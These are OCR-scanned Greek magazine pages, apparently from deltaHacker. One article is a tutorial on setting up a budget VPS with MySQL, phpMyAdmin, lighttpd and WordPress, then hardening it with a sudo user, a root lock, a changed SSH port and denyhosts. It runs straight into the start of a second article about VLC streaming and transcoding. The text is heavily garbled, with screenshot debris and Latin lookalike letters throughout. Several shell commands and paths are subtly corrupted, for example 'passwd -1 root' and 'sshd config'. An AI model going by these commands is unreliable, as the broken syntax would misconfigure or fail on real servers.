να δώσετε va ισχυρὀ password, ro οποίο φυσικά να θυµόσαστε! Αφού 
ολοκληρωθεί η εγκατάσταση, ενδἐχεται να εμφανιστεἰ ἑνα ανησυχητι- 
KÒ μήνυμα. Συγκεκριµένα, εἶναι πολύ πιθανό να εμφανιστεί η λέξη FAIL 
με κὀκκινα γράμματα, καθὼς ο MySQL server θα αποτύχει να ξεκινήσει. 
Αυτὀ δεν θα πρέπει va σας ανησυχἠσει. Όπως εἶπαμε προηγουμένως, o 
MySQL server εἶναι αρκετά βαρύς και oro default configuration απαιτεί 
περισσότερη RAM ano αυτἠ που διαθέτει ο μικρὸς µας VPS. Όπως αντι- 
λαμβάνεστε, Aoinóv, θα πρέπει να αλλάξουμε τη ρὐθμισή του. 


Στον κατάλογο /usr/share/doc/mysgql-server-5.1/examples/ βρίσκονται 
τρεις διαφορετικὲς εκδοχἑς για το αρχείο ρυθμίσεων. Εμεἰς ενδιαφερόµα- 
στε για ΤΟ my-small.cnf, το οποίο προορίζεται για χρήση σε συστήματα µε 
περιορισμένους πόρους. Το αρχείο ρυθµίσεων της MySQL βρίσκεται στη 
θέση /etc/mysqgl/ κι έχει το ὀνομα my.cnf. Προφανώς, εμείς θα πρέπει 
να το αντικαταστήσουμε µε ro my-small.cnf. Ωστόσο, yia ν΄ αποκτούμε 
σωστές συνήθειες, θα ξεκινήσουμε πρῶτα µε ἑνα backup: 


mv /etc/mysql/my.cnf /etc/mysql/my.cnf.bak 


Topa, αρκεἰ va μεταφέρουμε το v£o αρχείο puOuiceov στη θέση του 
παλιού: 


cp /usr/share/doc/mysql-server-5.1/examples/my-small.cnf /etc/ 
mysql/my.cnf 


Πα va επιβεβαιώσουμε ὁτι πήγαν ὁλα καλὰ, αρκεἰ να κάνουμε µια επανεκ- 
κίνηση του MySQL server, δίνοντας κάτι τέτοιο: 


service mysqld restart 


€ σ f$ |O 8083121244/phpmyadmin/ 
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Welcome to phpMyAdmin 


| Language | 


| English 


l Log in s. | 


Username: 


Password: 


A Cookies must be enabled past this point. 
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My-EUkoAn-Aiaysipicn! 


H διαχείριση της MySQL anó την κονσόλα εἶναι λίγο στριφνἠ, αλλά uno- 
ρούμε εὐκολα va τη μετατρέψουμε σε παιχνιδάκι. Ma TO σκοπὀ αυτό θα 
χρησιμοποιήσουμε το πασίγνωστο phpMyAdmin. Πρόκειται για ἑνα web 
interface, µέσα απὀ το οποίο μπορούμε να δημιουργούμε νέες βάσεις και 
νέους χρήστες για τις βάσεις, ὁπως επἰσης να διαχειριζόµαστε ολόκληρο 
TOV MySQL server. Η εγκατάσταση rou phpMyAdmin εἶναι εξίσου απλἠ µε 
όσες έχουμε πραγματοποιήσει μέχρι στιγμής: 


apt-get install phpmyadmin 


To νέο µας εργαλεἰο θα εἰναι ἐτοιμο προς χρήση, αμέσως μόλις τελειώ- 
σει η εγκατάσταση. Πα va το δούµε αρκεἰ να οδηγἠήσουµε &vav browser 
στη διεύθυνση http://my-server-ip/phpmyadmin. lia τη σύνδεση στο web 
interface δίνουμε ως ὀνομα χρήστη ro root, ενώ το σωστὸ συνθηματικὀ 
εἶναι εκείνο nou καθορἰσαµμε κατὰ την εγκατάσταση της MySQL. Πα την 
ώρα, ρἰχτε µια ματιὰ στις λειτουργίες που προσφέρει το phpMyAdmin, 
αλλά µην πειράξετε τίποτα. Θα επανέλθουµε αργότερα, αφού nponyou- 
μένως ξεμπερδέψουμε µε μερικὲς ακόµα βασικὲς ρυθμίσεις κι εγκαταστή- 
coupe ro WordPress. 


Βαπτίζεται o server... 


Εἶναι σχεδὀν ὁλα ἐτοιμα κι ο web server ανυπομονεί να δεχθεἰ ro nepi- 
εχόμενὸ µας, για να το μοιράσει στο Internet, το οποίο µε τη σειρἁ rou 
επἰσης ανυπομονεῖ. Εμείς, όμως, στις μέχρι τώρα δοκιμές µε το browser 
χρησιμοποιούσαμε τη διεύθυνση IP του server. Τι θα γίνει τελικἁ pe εκεἰ- 
ΝΟ ro domain name που λέγαμε; Μήπως έφτασε η opa να το αντιστοι- 
χήσουμε στον server µας; Πα τις ανάγκες της παρουσἰασής µας, θα uno- 
θέσουμε Or! έχουμε αγοράσει το «example.com». Προφανώς, το domain 
μας θέλουμε να δείχνει στη διεύθυνση IP του VPS. Αυτό unopsi να γίνει 
πανεύκολα, εἰτε απὀ ro panel του registrar (αν χρησιμοποιούμε την unn- 
peoia DNS του registar), cire απὀ ro panel rou pointhq. Συγκεκριμένα, 
θα πρέπει va επέµβουµε στο record µε ὀνομα «A» και να δώσουμε σαν 
ὀνομα ro domain name που θέλουμε να χρησιμοποιήσουμε (ro example. 
com) και σαν διεύθυνση IP εκείνη rou VPS. Μετὰ anó auró το απλούστα- 
το βήμα πρέπει να ρυθµίἰσουµε κατάλληλα και τον server µας. Πρέπει να 
εξασφαλίσουµε ὁτι ο lighttphd θα «ακούει» στο συγκεκριµένο domain 
name και θα σερβίρει το κατάλληλο περιεχόµενο. 


Αρχικά, μεταφερόμαστε στον κατάλογο /etc/lighttpd/conf-enabled. 
Ekei θα πρέπει να δημιουργήσουμε va νέο αρχείο, µε ἑνα ὀνομα σαν 
το 50-example.conf. Σε αυτὸ το αρχείο θα πρέπει να προσθέσουμε τις 
ακόλουθες γραμμές: 


$HTTP["host"] =~ "(^|\.)example\.com$" { 
server.document-root = "/var/www/my -example-site" 


} 


Ουσιαστικἁ, µε auró το αρχείο δηλώνουμε στο lighttpd ὁτι τα αιτήματα 
που περιέχουν το example.com θα εξυπηρετούνται µε το περιεχόμενο 
του καταλόγου /var/www/my-example-site. Με ἄλλα λόγια, δηλώνουμε 
ότι ο κατάλογος /var/www/my-example-site αποτελεἰ το document root 
yia το example.com. Φυσικά, πριν συνεχίσουμε τις εργασἰες µας πρέπει 
να δημιουργήσουμε το συγκεκριµένο κατάλογο και να ενεργοποιήσουµε 


1. Έχουμε αρχίσει va το παρακάνουµε µε αυτό το αστείο. Το ξέρουμε. 
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ποιήσουµε kánoiov Es z n at es ERE [E739 
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αυτὀν τον τρόπο, ος, ooi PME 

ΟΙ μεταφορές των ec " directory /var /www E 
αρχείων µας θα ΕΤΗ Directory listing successful ΕΞ 
πραγματοποιού- 5 


vrai µε ασφάλεια | 
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Server/Local file Direction Remote file Size Priority — Status 


Queuedfiles | Faied transfers | Successful transfers — | 


ĝm Queue: empty 94 


το αρχείο ρυθµἰσεων: 
mkdir /var/www/my-example-site 


lighttpd-enable-mod example 


WordPress, baby! 


Έφτασε η opa va εγκαταστἠσουµε ro CMS µας. Πα αρχἠ, θα κατεβάσου- 
µε το συμπιεσμένο πακέτο µε την τελευταία ἐκδοση του δημοφιλούς (κι 
αγαπημένου µας) WordPress. H λήψη του θα γίνει εντός του document 
root, ὁπως φαίνεται παρακάτω: 

cd /var/www/my-example-site 

wget http://wordpress.org/latest.zip 


To wget θα κατεβάσει ro αρχεἰο latest.zip κι εμεἰς θα πρέπει στη συνέχεια 
να ro αποσυμπιἐσουµε, δίνοντας κάτι τέτοιο: 


unzip latest.zip 


Εκτελώντας ro παραπάνω, θα δημιουργηθεἰ ἑνας κατάλογος µε ro ὀνομα 
wordpress. Μέσα σε αυτόν βρίσκονται ra αρχεία που απαρτίζουν ro CMS. 
Εμεἰς όμως δεν τα θέλουμε εκεἰ μέσα, αλλά στο document root. Π’ αυτό 
το λόγο θα πρέπει να τα μετακινήσουμε εκτελώντας το ακόλουθο: 


mv /var/www/my-example-site/wordpress/* /var/www/my-example- 
site/ 
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File: 50-giannoug.conf 


Σε ὁτι αφορἀ στο σύστημα, για την ολοκλήρωση της εγκατάστασης του 
wordpress απομένει µία ακόµα εργασία. Συγκεκριµένα, πρέπει va δημι- 
ουργήσουμε µια βάση στη MySQL, την onoia θα χρησιμοποιεί το CMS. Για 
το σκοπὀ auro, αρκεἰ να συνδεθούµε στο phpMyAdmin και va δημιουρ- 
γήσουμε ἑνα νέο χρήστη, µε περιορισμένα δικαιώματα πρόσβασης. Σε 
αυτὸ το νέο χρήστη θα ανατεθεἰ µια νέα βάση, η οποία θα δημιουργηθεἰ 
αυτόματα. Σημειώστε ὁτι για λόγους ασφάλειας του συστἡματὸς µας, 
αυτός ο χρήστης πρέπει va ἐχει ἑναν *apkerà* ισχυρό κωδικὀ. Αυτόν TOV 
κωδικὀ θα τον δώσουμε αργότερα στο wordpress και δεν θα τον χρησι- 
μοποιήσουμε ποτὲ ξανά. 


Τα υπόλοιπα βήματα yia την εγκατάσταση rou wordpress αφορούν στο 
ἰδιο το CMS και ὀχι στον server kai στις υπηρεσίες rou. Εμείς λοιπὸν θα ra 
παρακάμψουμε, αλλά αν ενδιαφἑἐρεστε μπορείτε va τα βρείτε στο http:// 
codex.wordpress.org/Installing WordPress. 


Ασφάλεια πάνω anó όλα 


Μετά anó τα παραπάνω, το site µας θα εἶναι ἐτοιμο va δεχτεἰ περιεχόµε- 
νο. Ta καταφέραμε! Ωστόσο, πριν αρχίσουμε να γράφουμε συμβουλές, 
tutorial, απόψεις κι οτιδήποτε ἄλλο, θα ἦταν φρόνιμο να ασχοληθούμε µε 
την ασφάλεια του server µας. Καταρχάς, δεν υπάρχει κανένας λόγος va 
συνδεόµμαστε στο λειτουργικὀ anó το λογαριασμὀ του root. Αντιθέτως, 
υπάρχουν αρκετοἰ λόγοι για το αποφεύγουμε. Εάν o server µας τρέχει 
κάποια ἑκδοση του Ubuntu, αυτὀ το ζήτημα εἶναι ἠδη λυμένο. Εάν όμως 
χρησιμοποιούμε ro Debian ἡ κάποια ἄλλη διανομὴ, θα πρέπει να το ÕI- 
ευθετήσουμε μόνοι µας. Συγκεκριµένα, θα δημιουργήσουμε ἑναν ακόμα 
λογαριασμὀ στο σύστημα, τον onoio θα χρησιμοποιούμε για τις καθη- 
μερινὲς εργασίες. O συγκεκριμένος λογαριασμὸς θα ἐχει περιορισμένα 
δικαιώματα, αλλά θα μπορεἰ να «αναβαθμἱζεται» µε τη βοήθεια του sudo. 
Για να δημιουργήσουμε ἑνα λογαριασμὀ στα γρήγορα, αρκεἰ να δώσουμε 
κάτι τέτοιο: 


adduser giannoug 


Εκτελώντας το παραπάνω, το σύστημα θα µας ζητήσει να δώσουμε δι- 
ἄφορες πληροφορίες yia το νέο χρήστη. Φυσικά, εμεὶς συμπληρώνουμε 


'Oco θα περνάει 

ο καιρὀς, τόσο 
περισσότερες ρυθ- 
μίσεις θα μπαίνουν 
στο προσωπικὀ 
configuration file 
µας. Μην αγχώ- 
νεστε αν το δικό 
σας εἶναι «ακόμη 
άδειο. 


Κάθε φορά που 0£- 
λουµε va δηµιουρ- 
γήσουμε µια βάση, 
θα ἦταν φρόνιμο 
να δημιουργούμε 
κι éva νέο χρήστη. 
Πατώντας στο 
Privileges » Add 
new user εµφα- 
νίζεται η σελίδα 
που φαίνεται στην 
εικὀνα. Αρκεί να 
ορίσουμε éva 
username της 
επιλογἠς µας κι ἑνα 
ισχυρὀ password. 
Στη συνέχεια µπο- 
ρούμε να δηµιουρ- 
γήσουμε µια βάση 
µε TO ἰδιο όνοµα 
(το username που 
δηλώσαμε), επί 
της οποίας θα ἐχει 
πλήρη δικαιώµατα 
ο χρήστης. 
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^9 / localhost | p » 


C fi owe 


phpMyAdmin 


283.490€ Add a new User 


ΕΝ... 


J -- ~ Login Information | 
ο ------ 


a -- User name: | use text field: 


| | dettahacker | 


d ——— 


a3 -— 


Host: | Local | [tocaihost E 


Kanara | Use textfield: Elif ssssasasacasssssassasi] 


Re-type: 


- i Database for user | 


mr 


Create User 


όσες και ὁποιες θέλουμε, ενώ στις υπόλοιπες πατάμε éva anAó [Enter]. 
Για να μπορεί o νέος χρήστης να χρησιμοποιεί το sudo, πρέπει va npo- 
σθέσουµε το λογαριασμό στην ομάδα (group) των διαχειριστών (admin). 
Αυτό γίνεται πολὺ εὐκολα: 


adduser giannoug admin 


Πλέον, μπορούμε va αποσυνδεθούµε απὀ ro server kai va συνδεθούµε 
εκ νέου, µε το νέο µας λογαριασμὀ. Παρεμπιπτόντως, τώρα μπορούμε va 
απενεργοποιήσουµε εντελώς το λογαριασμὀ του root. Πα να πετύχουμε 
κάτι τέτοιο, αρκεἰ να δώσουμε το ακόλουθο: 


passwd -1 root 


Αναρωτιέστε anó πού θα εκτελἐσουµε το παραπάνω; Ma puoikå απὀ το 
νέο µας λογαριασμὀ, αφού προηγουμένως ἐχουμε τρέξει το sudo κι ἐχου- 
µε βεβαιωθεί ὁτι λειτουργούν τα πάντα σωστά. Δεν θα θέλαμε va κλει- 
δωθούμε απέξω! Έτσι δεν εἶναι; Τέλος, av η απενεργοποίηση rou root 
δεν µας αρἐσει σαν ιδέα, θα πρέπει τουλάχιστον να του ορίσουμε ἑνα 
εξαιρετικἁ ισχυρό password. 


Κρυπτογραφημένη επικοινωνία 


O μόνος τρόπος yia va επικοινωνήσουµε µε την κονσόλα rou VPS µας 
εἶναι μέσω SSH. O ἴδιος τρόπος ὁμως εἰναι διαθέσιμος και σε οποιονδἠ- 
ποτε προσπαθεί να συνδεθεί στο μηχάνημά µας. Φυσικά, εμεἰς *ogv* το 
θέλουμε αυτὀ. Υπάρχουν δὺο τρόποι για va αποτρέψουμµε κἀτι τέτοιο και 
θα τους αξιοποιήσουμµε και τους δύο. 


O κλασσικότερος τρόπος yia να αφήσουμε απέξω τους ανεπιθύµητους 
επισκέπτες προβλέπει την αλλαγή της πόρτας στην οποία ακούει o SSH 
server. Τα περισσότερα bot στοχεύουν απευθείας στην πόρτα 22 nou 
ακούει το SSH εξ ορισμού. Αλλάζοντας την, γλυτώνουμε αρκετὲς απὀ- 
πειρες σύνδεσης nou ενδέχεται να µας εξαπολύσει κάποιο script kiddie. 
Για το σκοπὀ αυτό, αρκεἰ va επἐµβουµε στο αρχεἰο /etc/ssh/sshd config, 
ανοἰγοντὰς το µε κάποιον text editor: 
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nano /etc/ssh/sshd config 


H γραμμὴ nou θα χρειαστεὶ να αλλάξουμε βρίσκεται στην αρχὴ και nepi- 
λαμβάνει τη λέξη Port και τον αριθμὀ 22. Εμεἰς μπορούμε να αντικατα- 
στήσουμε το 22 µε σχεδὸν οποιονδήποτε αριθμὀ, μεγαλύτερο rou 1024. 
Αφού τροποποιήσουµε και αποθηκεύσουµε το αρχείο, θα χρειαστεί να 
επανεκκινήσουµε τον SSH server δίνοντας αυτό: 


service ssh restart 


Έναν λιγότερο διαδεδομένο αλλά ιδιαίτερα αποτελεσματικὀ rpóno yia την 
προστασία του SSH server, αποτελεὶ η χρήση rou denyhosts. Πρόκειται 
για ἑνα πρόγραµµα που παρακολουθεἰ τις συνδέσεις στον SSH server και 
ανάλογα µε την προἑλευσὴ τους, τις επιτρέπει ἡ τις απαγορεύει. Επιπλὲ- 
ον, επικοινωνεί µε ἑναν κεντρικὀ server, απὸ τον οποίο ενημερώνεται για 
ὁλες τις δικτυακὲς διευθύνσεις απὀ τις οποίες εξαπολύονται επιθέσεις. H 
εγκατάσταση του denyhosts γίνεται µε TO γνωστό τρὀπο: 


sudo apt-get install denyhosts 


Μετὰ την εγκατάσταση µπορεἰτε να απολαύσετε την πρόσθετη npooraoia 
που παρέχει το denyhosts, αφἠνοντάς το να λειτουργήσει µε τις «εργο- 
στασιακὲς» ρυθμίσεις. Εάν ωστόσο θέλετε να το σκαλἰσετε, καλὸ θα ἦταν 
va ρἰξετε µια ματιὰ και στο σχετικὀ FAQ: http://denyhosts.sourceforge. 
net/faqg.html. 


Ready, get, set, go! 


Αυτὸ ἦταν ὁλο! O πἀάµφθηνος VPS µας μπορεὶ va αντικαταστήσει τον 
πανάκριβο web host. Φυσικά, anó τον δικὀ µας server μπορούμε να npo- 
σφέρουµε και πρὀσθετες υπηρεσίες, πέρα απὀ το va σερβίρουμε σελίδες. 
Μπορούμε επἰσης να τον χρησιμοποιήσουμε και για ἄλλες εργασίες, ne- 
ρισσότερο ἡ λιγότερο, χμ, ἅτακτες :) Σκεφτεἰτε εξάλλου ὁτι μιλάμε για 
va Linux box το οποίο εἶναι ενεργοποιημένο 24/7 και συνδέεται στο 
δίκτυο µε µια γραμμὴ των 100Mbit! Πάντως, av ο σέρβερ µας βρίσκεται 
στην Αμερικἠ, το στήσιμο ενὸς VPN θα eixe ιδιαίτερο ενδιαφἐρον. Κάτι 
τέτοιο βέβαια αποτελεί προχωρημένη epyaoia και ξεφεύγει απὸ το napóv 
ἀρθρο. Δεν αποκλείεται ὁμως να την εξετάσουμε στο μέλλον. 


lines 


Κάθε πρόσθετο 
μέτρο ασφάλειας 
εἶναι χρήσιμο, 

όσο σπλό κι av 
φαίνεται. Εμείς 
λοιπὀν ξεκινήσαμε 
αλλάζοντας την 
προκαθορισμένη 
θύρα σύνδεσης 
στον SSH server... 
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Sk111: 
Intermediate 


Tags: 

VLC, streaming, 
screen recording, 
NOVA, Unicast, 
Multicast, 
Transcoding 


Πώς va οἰγοθπιάρετε 
τα panda όλα! 
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Σηµείωση rou Αρχισυντάκτη: Από ra tags και 
τον τίτλο του παρόντος άρθρου ἴσως οδηγηθεῖίτε 
σε εσφαλμένα συμπεράσματα για όλα óca 
ακολουθούν. Για την ακρίβεια, εἶναι πιθανὀ να 
κάνετε εὐκολες υποθέσεις -- ενδεχομένως και να 
γυρίσετε βιαστικά μερικὲς σελίδες, nnyaivovrag 
για το επόμενο ἀρθρο. Μην το κάνετε. 
Στοιχηματίζουμε ὅτι δεν ἐχετε δει ξανά vav 
network engineer να χρησιμοποιεί το VLC -- κι 
όπως θα διαπιστώσετε μπορεῖ να κάνει θαύματα p’ 
αυτό! Αρκεἰ π.χ. v' αναφέρουμε πως οὐτε η NOVA 

του ξεφεύγει ;) 


| uU 


Εικόνα 1 

To VLC µπορεί va 
πραγματοποιεί 
διαμοιρασμὀ ροής 
δεδομένων σε 
πραγµατικό χρόνο, 
µε πηγἠ κάποιο 
αρχείο audio/video, 
ένα DVD ἡ κάποιο 
Internet stream. 
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To VLC λίγο πολύ ὁλοι TO ξέρουμε (www.videolan.org/vlc). Πα όσους ἐφτα- 
σαν χθες anó το Άλφα του Κενταύρου ἡ δεν ἐχουν ακόµη συνειδητο- 
ποιήσει ὁτι το VLC *óev* εἶναι ἄλλος ἑνας media player, να πούμε ὁτι 
ναι μεν πρὀκειται για µια εκπληκτική εφαρμογἠ αναπαραγωγἠς audio/ 
video, αλλά oi δυνατὀτητέἑς της εκτείνονται στο streaming καθώς και στο 
transcoding (επανακωδικοποίηση audio/video σε αρχεία διαφορετικού 
format). H ονομασία «VLC» προέρχεται anó το VideoLAN Client, ὅπως 
όμως θα διαπιστώσουμε σε λἰγο µπορεί κάλλιστα να λειτουργήσει και ως 
VideoLAN Server. 


To VLC κυκλοφορεί για όλα σχεδὸν τα λειτουργικἁ συστήματα: Windows, 
Mac OS X, Linux, BSD κ.ά. Το γεγονὸς αυτὀ σημαίνει διαλειτουργικὀτητα 
μεταξύ των διαφόρων συστημάτων, χαρακτηριστικὀ Ξεξαιρετικἁξ χρήσι- 
uo σε λειτουργίες ὁπως ro streaming. Επἰσης, ως ελεύθερο λογισµικὀ που 
εἶναι, χρησιμοποιεί ελεύθερες βιβλιοθήκες κωδικοποϊησης/αποκωδικοποἰ- 
nonc. Πα παράδειγµα, πολλά απὀ ra codecs rou VLC προέρχονται απὀ τη 
δηµοφιλέστατη βιβλιοθήκη libavcodec rou FFmpeg (http://ffmpeg.org). 
Επιπρὀσθετα, η ἴδια η σχεδίαση rou VLC επιτρέπει την ενσωμάτωση νέων 
codec ἡ νέων μεθόδων streaming. 


Ta interfaces που παρέχει ro VLC στο χρήστη δεν περιορἰζονται στο κλα- 
σικὀ, για το περιβάλλον γραφικών. Αρκεὶ π.χ. v' αναφέρουμε ότι παρέχει 
μέθοδο απομακρυσμένου ελέγχου καθώς κι ἑνα ncurses based interface, 
για την κονσόλα κειμένου. Και η ευελιξία χειρισμού συνεχίζεται: Πέρα 
anó το πληκτρολόγιο ἠ/και το ποντίκι, το VLC μπορούμε va το χειριζόμα- 
στε µε χειριστήριο υπερύθρων, µε διάφορες εφαρμογές για smartphones, 
tablets κ.ο.κ. 


Πριν συνεχίσουμε, αξίζει να σημειώσουμε ὁτι, λόγω του σχεδιασμού TOU, 
TO VLC αναπαράγει περιεχόμενο ακόµη κι αν ἑνα μεγάλο μέρος του βίντεο 
εἶναι κατεστραμμένο. Αυτὀ το καταφέρνει γιατὶ βασίζεται στην avanapa- 
γωγἠ (playback) κατὰ πακέτα. 


Š Αναπαραγωγός πολυμέσων VLC 


ορ Αναπαραγωγή κος — Bivreo Εργαλεία Προβολἠ Βοήθεια 


|] Άνοιγμα Αρχείαυ,., {τΗΗ-Ο 
ἄνοιγμα Apyeiou yia Πραχιηρημένοιις,,., Ctel+Shift+0 
Άνοιγμα (bake&au ... Ctrl+F 

) Άνοιγμα Δίσκου... Ctrl+D 
'Avoypa Pog Δεδομένων Acron... (ΓΝ 
Άνοιγμα Συσκευής ΞΙλλγιμγις... Crl--C 


Άνοιγμα Τοποβεσίας απὀ το πρὀ”ειρο Ctri--v 
Πρόπιρατα Πολυμέσα 


ΑποΒήκειιπη Aigrac Avanapayoyric σε Apyzin. .. Cri- Y 


Μετατροπή | AnoBriceuan. .. (ΓΗΒ. 
Ροή Δεδομένων Ctrl+5 


Ἐξοδας (ΓΟ 


Πώς va streamápeve τα panda όλα! 
ri 


Στο υπόλοιπο του άρθρου θα δείξουμε μερικούς εξαιρετικἀ ενδιαφἐρο- 
ντες και πρωτότυπους τρόπους χρήσης rou VLC. (Οι δοκιμές µας npay- 
ματοποιήθηκαν στα λειτουργικἀ συστήματα Windows ΧΡ, Windows 7, Mac 
OS X και iOS.) Πεποϊθησή µας εἶναι ὁτι κάθε χάκερ (στην ψυχὴ) που θα 
καταπιαστεἰ ἑστω µε την απλἠ αναπαραγωγἠ video, δεν υπάρχει nepinro- 
ση ν΄ ασχοληθεἰ µε ro VLC και να µην το συµπαθήσει. 


Transcoding 


Beginner Level 


Έστω ὁτι έχουμε κατεβάσει ἑνα ωραίο video clip της µορφής .mp4 απὀ 
το YouTube και θέλουμε να το µετατρέψουµε σε .mp3, επειδἠ βασικἀ 
αυτό nou µας ενδιαφἑρει εἶναι μόνο ο ἦχος. Αρχικά, ανοίγουμε ro VLC 
και δίνουμε Tools --» Preferences (ἡ πατάμε το συνδυασμὀ πλήκτρων 
[Ctrl--P]). Στο Show settings επιλέγουμε All και µετά Stream output 
--» Sout stream --» Transcode (ro «Sout» προέρχεται απὀ ro Stream 
output). Όλες οι ρυθμίσεις yia ra format, τα μεγέθη, τους υπότιτλους 
κ.λπ. βρίσκονται εδὠ. Αν επιθυμούμε να κάνουμε κάποια ρύθμιση την 
κάνουμε κι αµέσως μετὰ πατάμε Save. 


Εικόνα 2 

2TO VLC yia Mac 
OS X, παρατηρού- 
µε ra πρωτόκολλα 
που χρησιµοποι- 
ούνται για TO 
streaming πολυµε- 
σικὠν εφαρμογών. 
τα UDP Unicast/ 
Multicast, RTP 
Unicast/Multicast, 
MMS kai HTTP 
εἶναι ra δικτυακά 
πρωτόκολλα που 
επικρατούν. 


Από το μενού Media επιλέγουμε Convert/Save και στο υπομενού File ro 
Add. Υποδεικνύουμε το αρχείο .mp4 που κατεβάσαμε anó ro YouTube 
και πατάμε στο Convert/Save. Στο πεδίο Destination file, µε Browse δια- 
A£youyus τη θέση και το ὀνομα του αρχείου προορισμού, ενώ στο πεδίο 
Settings πατάμε στο Profile το format που επιθυμούμε να γίνει η pE- 
τατροπἠ. lia ro audio διαλέγουµε 
MP3 και κάνουμε κλικ στο Start. 
Αυτὸ rjrav! Μη βιάζεστε να φύγετε 
απὀ ðw. Υπάρχουν va σωρὀ puð- 
μίσεις και παράμετροι για να yà- 
ξετε. Εξερευνήστε τα Settings του 
Convert, δεν θα ro μετανιώσετε! 


eon Streaming/Transcoding Wizard | 


Streaming 


This page allows to select how the input stream will be sent. 


Streaming method 


Αποθήκευση — streaming enrii ook: C) μας 
media σε αρχείο ρα Φε ως 


Use this to stream to a dynamic group of computers on a 
multicast-enabled network. This is the most efficient method to 
stream to several computers, but it won't work over Internet. RTP 

headers will be added to the stream 


Μπορούμε va αποθηκεύσουµε TO- 
niKd στον υπολογιστή µας µια õi- 
κτυακἠ ροή (network stream), 
n.x., απὀ éva live web radio ἡ απὀ 
va web tv station. Από το μενού 


επιλέγουμε Media --» Streaming 
--» Network και κάνουμε paste το 
URL του σταθμού nou θέλουμε va 
αποθηκεύσουµε. Πατάμε Next και 
στο πεδἰο Destination επιλέγουμε 
το αρχείο ónou θέλουμε να ano- 
θηκευτεὶ το stream. Τελικά, πατώ- 
ντας Stream αποθηκεύουμε ro live 
stream στον υπολογιστή. 


Ἕνας ἁριστος τρόπος για ν΄ apyi- 
σετε ομαλά µε αυτἠ τη δυνατότη- 
τα, εἶναι να χρησιμοποιήσετε τους 
ραδιοφωνικούς και τηλεοπτικούς 


Destination 


Enter the multicast address to stream to in this field. This must 
be an IP address between 224.0.0.0 and 239.255.255.255. For a 
private use, enter an address beginning with 239.255. 


t Cancel | | Back 
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Εικόνα 3 

H επιλογή της 
κάμερας του 
Playstation 3 ως 
capture device μάς 
παρέχει τη δυνατό- 
τητα VG δηµιουρ- 
γήσουμε εφαρµο- 
y&c που θυμίζουν 
..UStream :D 
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σταθμούς nou *rjón* υπάρχουν στην playlist Tou VLC. Από το μενού 
View επιλέγουμε Playlist (ñ πατάμε [Ctrl--L]). Στο αριστερὀ μέρος, που 
βρίσκεται o Media Browser, πατάμε Internet. Ανάλογα µε την ἐκδοση 
του VLC που έχουμε, εμφανίζονται ομάδες Internet media stream. Στην 
ἐκδοση του γράφοντα υπάρχουν oi ακόλουθες ομάδες: Podcasts, Free 
Music Charts, Freebox ΤΝ, Icecast Directory, Jamendo Selections και 
Channels.com. Πατώντας, n.x., ro Free Music Charts, ανοίγει η ομάδα µε 
TG streams yia μουσικἠ anó ra charts του 2007 ἑως rou 2012. Επιλέγο- 
vrac Free Music Charts January 2012 --» Songs --» Paranoia, ακούμε TO 
τραγούδι των Wonderland «Paranoia». Αν θέλουμε va ro κατεβάσουµε 
στον υπολογιστή πατάμε το δεξὶ κουμπί του ποντικιού και κάνουμε Save! 
Αξίζει va το ψάξετε λἰγο το θέμα και µη σας Φαίνεται παιχνιδάκι. 


Να και κάτι ἄλλο, εξίσου ενδιαφἐρον. Πηγαίνετε στο http://greek-video. 
net/greece/live-tv. Στο ERT World κάντε δεξὶ κλικ στο Unicast κι αντι- 
γράψτε την τοποθεσἰα δεσμού. Ουσιαστικά, έχετε στο clipboard την akò- 
λουθη διεύθυνση: 


http://www.noc.ntua.gr/binary/streaming/tv.ram 


Βάλτε τη στο VLC ως Network stream και δείτε το αποτέλεσμα. Ερώτηση: 
Μπορούμε να δούμε το δορυφορικὸ κανὰλι ERT World, anó το σπίτι µας; 
Ποια εἶναι η διαδικασία; Οι απαντήσεις μπορούν να δοθούν στο forum 
του deltaHacker ἡ κάτω απὀ το post της εισαγωγἠς αυτού του άρθρου 
-- πάντα στο http://deltahacker.gr. (Δυστυχώς, μετὰ ro 2009 η ΕΡΤ AE 


| $ Open Media 


Cile | © pise | S? Network f Capture Device | 

Capture mode [precshow o Ἡ 
Video device name Refresh list | Configure | [Psstye camera τ] 
Audio device name Refresh list | Configure | USB Camera-B4. 094 
y Options 


Video size | 


Γ᾽ Show more options 


Stream M Cancel | 


Πώς va streamápeve τα panda όλα! 
ri 


ἐχει αποσύρει την υπηρεσία αυτή *kai* μέσα απὀ το Εθνικὸ Μετσόβιο 
Πολυτεχνείο, οπὀτε στα σίγουρα δεν θα δείτε ERT World! Αξίζει όμως να 
δείτε µε ποιες διαδικασἰες θα μπορούσε κάποιος να το πετύχει :D) 


Μοίρασμµα της επιφάνειας εργασίας 


Οι περισσότεροι anó εμάς ἐχουμε χρησιμοποιήσει --ἡ έχουμε δει να χρη- 
σιμοποιούν-- στο Skype το «Share my computer desktop», ὁπου o ou- 
νοµιλητής ἡ οι συνομιλητές µας ἐχουν τη δυνατότητα να βλέπουν σε 
πραγµατικὀ χρόνο το desktop του υπολογιστή µας. To ἰδιο µπορεἰ va 
επιτευχθεὶ *kar* ue ro VLC. 


Ανοίγουμε ro Media και πάμε oro Streaming. Anó το μενού επιλέγουμε 
το Capture Devices και στο Capture mode βάζουμε ro Desktop. Ἐπειτα 
πατάμε Stream και µε Next οδηγούμαστε oro Destination, ónou μπορού- 
µε va οδηγἠσουµε ὀλη τη ροή δεδομένων σε va αρχεἰο (επιλογἠ File) 
ἡ σε εκπομπή Unicast/Multicast. Επιλέγοντας την κατάλληλη διεύθυνση 
προορισμού, κάνουμε stream την επιφάνεια εργασίας µας. Ψάξτε ὀλεςτις 
παραμέτρους κωδικοποίησης yia va δείτε τον nio αποτελεσματικὀὸ τρόπο 
κατὰ τον οποίο επιτυγχάνεται η διαδικασία. Θα παρατηρήσετε ὁτι ὁσο 
θυσιάζουµε την ποιότητα της εικὀνας και TOU ἠχου, τόσο ποιο γρήγορη θα 
εἶναι και η ροή των δεδοµένων. 


E intermediate Levei ο 


Δημιουργία εφαρµογής τύπου UStream, 
στο LAN και ὀχι µόνο! 


Θέλουμε va αναπαράγουµε, μέσα στο ἴδιο µας το σπίτι, τη λειτουργία 
streaming της υπηρεσίας UStream (www.ustream.tv) ἡ ἄλλων napópoir- 
ων. Το UStream Χρησιμοποιούμε και στο περιοδικὀ, για τα λεγόμενα 
Live Stream που κάνουμε µία φορὰ το µήνα: http://deltahacker.gr/live- 
stream. 


Φυσικά, χάρη στην ευελιξία του VLC δεν εἶναι απαραίτητο va στήσουμε 
κάποιον streaming server, οὐτε va εγκαταστήσουμε και να ρυθµίσουµε 
